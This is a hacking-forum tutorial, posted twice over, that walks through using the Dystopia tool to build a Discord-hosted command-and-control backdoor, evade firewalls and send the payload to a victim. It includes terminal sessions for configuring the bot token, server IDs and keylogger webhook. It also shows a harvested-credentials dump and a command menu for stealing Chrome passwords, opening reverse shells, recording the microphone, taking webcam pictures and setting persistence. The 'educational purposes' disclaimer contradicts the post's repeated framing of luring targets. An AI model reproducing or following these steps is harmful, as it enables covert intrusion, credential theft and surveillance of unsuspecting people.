D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
My name is Vincenzoo72, and I am writing this article for the XSS.is forum only, and all rights are given to the XSS.is forum.
Table Of Content
1. How Hackers Use Discord To Hack The PC.
2. How To Hack The Victim PC and Gain Unauthorized Access.
Note: All the information in that article is only for educational purposes and does not promote illegal or unethical activities.
1. "How Hackers Use Discord To Hack The PC"
Nowadays generally backdoors are very simple to detect even by the very simple "Antivirus". This is the reason why Hackers are looking for the other ways to make their "backdoors" undetectable by mimicking the normal website traffic using encrypted communication and much more. In this way, the incoming and going traffic to the "C2" Server, is harder to detect. Making Malware traffic harder to detect becomes a necessary step due to how advanced the detection systems have become.
EXAMPLE: Let's take an example of the hacker and the target, the hacker is sending the "Payload" to the victim by using the source(IP address) and destination if the payload is in the simple execution(.exe) that will easily detect by the System Firewall read that file and easily blocked our attack.
To counter that we will send the target "Encrypted Payload" so that it is harder for the "firewall" to detect that is it Malicious or not. We can send our "Encrypted Payload" using the cloud server, but in that article, we will learn instead of buying the cloud servers, how to use the existing server to run our "Payload" with the encryption and breach the security of our target and gaining the full access to their PC. We have a lot of servers and bot are executing that but I am going with the "Discord Server" as it is easy and manageable with a single click. For doing this is very simple a Hacker machine and the victim in middle our "Discord-Bot" now we are good to go for the attack lets learn step by step how to do that.
Hence in that form, the payload is encrypted by the SSL, and also the source is coming from (Api.discord.com) as the discord has millions of traffic every day, the firewall is not able to catch that this file is malicious or Safe.
2. "How To Hack The Victim PC and Gain Unauthorized Access"
For hacking the target PC, we will use the tool called as "Dystopia", and the discord server hence we are able to send our encrypted payload to the victim pc and gain full admin control access.
"Dystopia": is a tool that creates the backdoor using the (Discord, Telegram, and GitHub) as the C2 server, it doesn't require the hacker to host the server that he/she is using.
How Does the Dystopia Works;
1. It uses a "Bot" or a fake account to communicate with the attacker.
2. Fully undetectable traffic like "HTTPS" traffic, exactly looks like normal internet traffic.
3. Fully Granted with the client-based features.
So in this article we will learn how to hijack the target PC using (Dystopia Discord Server).
As shown in the Picture we have Our own pc as the attacker and the victim pc and the already existing discord server rather than buying the new cloud server. We can use (Dystopia Discord Server) for this attack, the discord bot running on the target machine is waiting for the command, then the attacker can then these commands in form of the text messages, and those messages are routed from the discord server to the discord bot of our victim. After receiving the executing command is generated and is again back sent to the "Discord server" and from then to the Attacker Discord in the form of the text messages. In this way, we can run the malicious code on the victim's PC using the discord Bot. Let's Start the practical;
1. In "Kali Linux" we have to install the "Dystopia" You guys can simply click on that link:https://github.com/3ct0s/dystopia-c2 , after opening the tab click on the "Code" button copy the link and paste it into the "Kali Linux" Terminal by using that command.
Код: Скопировать в буфер обмена
2. After cloning we have to check the directory just type that in the Kali Linux "cd dystopia-c2", and the "ls" then press enter. Now we have cloned the setup now we have to run the setup.
3. Then we have to get a permission of the file and get an executable using that command: "chmod +x setup.sh" then press enter, after that we will have to run the setup. The kali terminal also ask you guys for the password just enter it, because this can run as the root and then the setup will start.
Код: Скопировать в буфер обмена
3. In the setup the kali will show you guys the popup for installation of the phyton 3.8.9 bit just press on the install button it may take a while after the installation click on the close button the process for setting up the Dystopia will resume.
4. After the setup finish, open your discord in the browser and login you account. Then go to the setting of the discord and scroll down to the advance and "Enable" The "Developer Mode".
5. Now we have to create our server go to home page click on the add server, click create my own for me and my friends and give the name to the server and click on the create. Now we have a place to with with on the bot but currently we don't have any one for the chat except ourself. So lets go a head and create a bot, open the discord developer mode or just click on that link you guys will be redirected: https://discord.com/developers/applications .
After opening the tab click on the "New application" and give the name i am using the name "Dystopia" after checkmark the term and conditions and click on the create.
6. Then or the left side of the page click on the "Bot" then allow the these three checkmarks and click on the save changes button;
1. Presence intent.
2. Server Member Intent.
3. Message Content Intent.
NOTE: This is the most important setting that allow us to communicate with the target PC.
7. Then Click On the "OAuth2" on the 1st box click on the "Bot" and on the 2nd box click on the "Administrator" and scroll down and copy the link and open it into the new tab.
Then the new discord page will be open just click on the server you have just created now and click on the create then authorize, after creation you will be redirected to that page.
8. Perfect Now we have successfully added our bot into the chat. Now we have to create the "bot token" and save it because we will need them later while making the "backdoors".
9. For creating the bot token click on the left side on the bot section and click on the "reset token" which can be seen in the bot section now. copy it and send to the server because we need it later.
10. Now we have to create a "web hook" for that click on the server then server setting then go to the integration and the click on the webhooks then click on the new webhook give the name and set channel to the general and click on the save changes.
11. Now we have to generate the "Backdoor" for that go back to the kali and we have to run the builder of the tool by typing that command: "sudo python 3 builder.py", then it will ask for the kali password which set to be the default as "kali" and press the enter.
12. Great we are in now as we are using the Discord server for making a payload we will type that "use discord" and then "use discord c2" and then press enter.
Код: Скопировать в буфер обмена
13. As we have the "Backdoor, Guild ID, Bot Token, Channel ID, Keylogger Webhook" all are correct but not showing the result none, now we have to set their name so type in the terminal of kali that command : help set , then we have to key them their commands as follows;
1. Name: set name to dystopia
2. Guild ID: The guild id is basically the server id right on the server and copy the guild id and paste it in the kali terminal.
3. Bot Token: It is the same we have reset and send the new one to their server chat just copy it from their and paste it into the terminal.
4. Channel ID: The channel id is simply the general chat id just right click on the general and copy the id and paste it.
5. Webhook URL: For finding that go back to their server setting click on the integration and then webhook and click on the copy URL and then paste it.
Код: Скопировать в буфер обмена
NOTE: These all steps are the core of this article so make sure while doing these steps.
14. After putting them all type the "Build" command in the terminal and the the Kali terminal will ask you to sure that you want to create the backdoor Press "Y" for confirmation, and the kali will start building the backdoor for you.
15. Great our payload is now created and stored in the "dist directory" now we just have to do copy the file and send to the target. As our target click on the file, we will make a connection with him and as i mentioned we will get in the form of a Message in the discord server. After making the connection with the target type the "ils" command this will show us the actual number of agents online with the IP Address.
16. Each agent has the different command function you can simply click on it for execution of that command.
17. As now i will click on the credentials of the victim pc then our payload will send us at the same moment in form of a message.
Код: Скопировать в буфер обмена
18. Their Are lots of functions we can like (screenshot, location, reset, download any external file etc.) the do by these commands;
Код: Скопировать в буфер обмена
19. For interacting with only one agent just click on the interact command or type /interact with the agent user id.
20. If the you have the webcam we can also click the picture and get in our discord server. Just like that and you guys can do much more fun as you have to do.
Final analysis: Using discord for making backdoors and breaching the security is a very simple way for getting the access of the Target pc with the full admin control access and all the things are managed by the discord it is easy to convivence our target to fall into our trap.
Note: All the information in that article is only for educational purposes and does not promote illegal or unethical activities.
Thanks!
Table Of Content
1. How Hackers Use Discord To Hack The PC.
2. How To Hack The Victim PC and Gain Unauthorized Access.
Note: All the information in that article is only for educational purposes and does not promote illegal or unethical activities.
1. "How Hackers Use Discord To Hack The PC"
Nowadays generally backdoors are very simple to detect even by the very simple "Antivirus". This is the reason why Hackers are looking for the other ways to make their "backdoors" undetectable by mimicking the normal website traffic using encrypted communication and much more. In this way, the incoming and going traffic to the "C2" Server, is harder to detect. Making Malware traffic harder to detect becomes a necessary step due to how advanced the detection systems have become.
EXAMPLE: Let's take an example of the hacker and the target, the hacker is sending the "Payload" to the victim by using the source(IP address) and destination if the payload is in the simple execution(.exe) that will easily detect by the System Firewall read that file and easily blocked our attack.
To counter that we will send the target "Encrypted Payload" so that it is harder for the "firewall" to detect that is it Malicious or not. We can send our "Encrypted Payload" using the cloud server, but in that article, we will learn instead of buying the cloud servers, how to use the existing server to run our "Payload" with the encryption and breach the security of our target and gaining the full access to their PC. We have a lot of servers and bot are executing that but I am going with the "Discord Server" as it is easy and manageable with a single click. For doing this is very simple a Hacker machine and the victim in middle our "Discord-Bot" now we are good to go for the attack lets learn step by step how to do that.
Hence in that form, the payload is encrypted by the SSL, and also the source is coming from (Api.discord.com) as the discord has millions of traffic every day, the firewall is not able to catch that this file is malicious or Safe.
2. "How To Hack The Victim PC and Gain Unauthorized Access"
For hacking the target PC, we will use the tool called as "Dystopia", and the discord server hence we are able to send our encrypted payload to the victim pc and gain full admin control access.
"Dystopia": is a tool that creates the backdoor using the (Discord, Telegram, and GitHub) as the C2 server, it doesn't require the hacker to host the server that he/she is using.
How Does the Dystopia Works;
1. It uses a "Bot" or a fake account to communicate with the attacker.
2. Fully undetectable traffic like "HTTPS" traffic, exactly looks like normal internet traffic.
3. Fully Granted with the client-based features.
So in this article we will learn how to hijack the target PC using (Dystopia Discord Server).
As shown in the Picture we have Our own pc as the attacker and the victim pc and the already existing discord server rather than buying the new cloud server. We can use (Dystopia Discord Server) for this attack, the discord bot running on the target machine is waiting for the command, then the attacker can then these commands in form of the text messages, and those messages are routed from the discord server to the discord bot of our victim. After receiving the executing command is generated and is again back sent to the "Discord server" and from then to the Attacker Discord in the form of the text messages. In this way, we can run the malicious code on the victim's PC using the discord Bot. Let's Start the practical;
1. In "Kali Linux" we have to install the "Dystopia" You guys can simply click on that link:https://github.com/3ct0s/dystopia-c2 , after opening the tab click on the "Code" button copy the link and paste it into the "Kali Linux" Terminal by using that command.
Код: Скопировать в буфер обмена
Код:
-(kali✪kali)-[~]
git clone https://github.com/3ct0s/dystopia-c2.git Cloning into 'dystopia-c2' ...
remote: Enumerating objects: 550, done.
remote: Counting objects: 100% (236/236), done.
remote: Compressing objects: 100% (93/93), done.
remote: Total 550 (delta 149), reused 190 (delta 130), pack-reused 314
Receiving objects: 100% (550/550), 164.37 KiB | 1.75 MiB/s, done.
Resolving deltas: 100% (282/282), done.
-(kali kali)-[~]2. After cloning we have to check the directory just type that in the Kali Linux "cd dystopia-c2", and the "ls" then press enter. Now we have cloned the setup now we have to run the setup.
3. Then we have to get a permission of the file and get an executable using that command: "chmod +x setup.sh" then press enter, after that we will have to run the setup. The kali terminal also ask you guys for the password just enter it, because this can run as the root and then the setup will start.
Код: Скопировать в буфер обмена
Код:
(kali✪ kali)-[~]
git clone https://github.com/3ct0s/dystopia-c2.git Cloning into 'dystopia-c2'.
remote: Enumerating objects: 550, done.
remote: Counting objects: 100% (236/236), done.
remote: Compressing objects: 100% (93/93), done.
remote: Total 550 (delta 149), reused 190 (delta 130), pack-reused 314
Receiving objects: 100% (550/550), 164.37 KiB | 1.75 MiB/s, done.
Resolving deltas: 100% (282/282), done.
-(kali kali)-[~]
cd dystopia-c2
-(kali® kali)-[~/dystopia-c2]
ls
I
builder.py code img libraries LICENSE README.md requirements.txt setup.sh
-(kali kali)-[~/dystopia-c2]
chmod +x setup.sh
-(kali® kali)-[~/dystopia-c2] ./setup.sh
/etc/lsb-release doesn't exist3. In the setup the kali will show you guys the popup for installation of the phyton 3.8.9 bit just press on the install button it may take a while after the installation click on the close button the process for setting up the Dystopia will resume.
4. After the setup finish, open your discord in the browser and login you account. Then go to the setting of the discord and scroll down to the advance and "Enable" The "Developer Mode".
5. Now we have to create our server go to home page click on the add server, click create my own for me and my friends and give the name to the server and click on the create. Now we have a place to with with on the bot but currently we don't have any one for the chat except ourself. So lets go a head and create a bot, open the discord developer mode or just click on that link you guys will be redirected: https://discord.com/developers/applications .
After opening the tab click on the "New application" and give the name i am using the name "Dystopia" after checkmark the term and conditions and click on the create.
6. Then or the left side of the page click on the "Bot" then allow the these three checkmarks and click on the save changes button;
1. Presence intent.
2. Server Member Intent.
3. Message Content Intent.
NOTE: This is the most important setting that allow us to communicate with the target PC.
7. Then Click On the "OAuth2" on the 1st box click on the "Bot" and on the 2nd box click on the "Administrator" and scroll down and copy the link and open it into the new tab.
Then the new discord page will be open just click on the server you have just created now and click on the create then authorize, after creation you will be redirected to that page.
8. Perfect Now we have successfully added our bot into the chat. Now we have to create the "bot token" and save it because we will need them later while making the "backdoors".
9. For creating the bot token click on the left side on the bot section and click on the "reset token" which can be seen in the bot section now. copy it and send to the server because we need it later.
10. Now we have to create a "web hook" for that click on the server then server setting then go to the integration and the click on the webhooks then click on the new webhook give the name and set channel to the general and click on the save changes.
11. Now we have to generate the "Backdoor" for that go back to the kali and we have to run the builder of the tool by typing that command: "sudo python 3 builder.py", then it will ask for the kali password which set to be the default as "kali" and press the enter.
12. Great we are in now as we are using the Discord server for making a payload we will type that "use discord" and then "use discord c2" and then press enter.
Код: Скопировать в буфер обмена
Код:
Run 'help use' to get started! [+] > use discord
[+] Using Discord C2
| Disctopia Backdoor Settings |
Setting
Value
+
+
Backdoor Name
None
Guild ID
None
Bot Token
None
Channel ID
None
| Keylogger Webhook
None
Run 'help set' for more information
[+] discord >13. As we have the "Backdoor, Guild ID, Bot Token, Channel ID, Keylogger Webhook" all are correct but not showing the result none, now we have to set their name so type in the terminal of kali that command : help set , then we have to key them their commands as follows;
1. Name: set name to dystopia
2. Guild ID: The guild id is basically the server id right on the server and copy the guild id and paste it in the kali terminal.
3. Bot Token: It is the same we have reset and send the new one to their server chat just copy it from their and paste it into the terminal.
4. Channel ID: The channel id is simply the general chat id just right click on the general and copy the id and paste it.
5. Webhook URL: For finding that go back to their server setting click on the integration and then webhook and click on the copy URL and then paste it.
Код: Скопировать в буфер обмена
Код:
kali@kali: ~/dystopia-c2
Help Menu:
"set <setting> <value>" Sets a value to a valid setting
Settings:
"name" - The name of the backdoor
"guild-id" - The ID of the Discord server "bot-token" The token of the Discord bot "channel-id" - The ID of the Discord channel "webhook" - The webhook for the keylogger
[+] discord > set name dystopia
[+] discord > set guild-id 125516830935xxxxx
[+] discord > set bot-token MTI1NTE20DQ4Nzk5NTg3MTMzNQ.GhsZbxxxxxxxxxxxxx
[+] discord > set channel-id 12551683xxxxxx
[+] discord > set webhook https://discord.com/api/webhooks/125516xxxxxxxxxx
[+] discord > build
[?] Are you sure you want to build the backdoor? (y/n)NOTE: These all steps are the core of this article so make sure while doing these steps.
14. After putting them all type the "Build" command in the terminal and the the Kali terminal will ask you to sure that you want to create the backdoor Press "Y" for confirmation, and the kali will start building the backdoor for you.
15. Great our payload is now created and stored in the "dist directory" now we just have to do copy the file and send to the target. As our target click on the file, we will make a connection with him and as i mentioned we will get in the form of a Message in the discord server. After making the connection with the target type the "ils" command this will show us the actual number of agents online with the IP Address.
16. Each agent has the different command function you can simply click on it for execution of that command.
17. As now i will click on the credentials of the victim pc then our payload will send us at the same moment in form of a message.
Код: Скопировать в буфер обмена
Код:
{
"http://testphp.vulnweb.com/login.php":[
{
"username": "admin", "password": "admin",
"date_created": "2025-03-08 21:48:14.205409"
}
]
}
11318. Their Are lots of functions we can like (screenshot, location, reset, download any external file etc.) the do by these commands;
Код: Скопировать в буфер обмена
Код:
Upload file to agent /screenshot
Grab a screenshot from the agent
/creds
Get chrome saved credentials
/persistent
Enable persistence
!ls
Get a list of all active agents
/download <path>
Download file from agent
/terminate
Terminate the session
/cmd-all <command>
Run a command on all agents
/location
Get the location of the target machine
/revshell <ip> <port>
Get a reverse shell on the target machine
/recordmic <interval>
Record the microphone of the target machine
/wallpaper <path/url>
Change the wallpaper of the target machine
/killproc <pid>
Kill a process on the target machine
+
Message #general19. For interacting with only one agent just click on the interact command or type /interact with the agent user id.
20. If the you have the webcam we can also click the picture and get in our discord server. Just like that and you guys can do much more fun as you have to do.
Final analysis: Using discord for making backdoors and breaching the security is a very simple way for getting the access of the Target pc with the full admin control access and all the things are managed by the discord it is easy to convivence our target to fall into our trap.
Note: All the information in that article is only for educational purposes and does not promote illegal or unethical activities.
Thanks!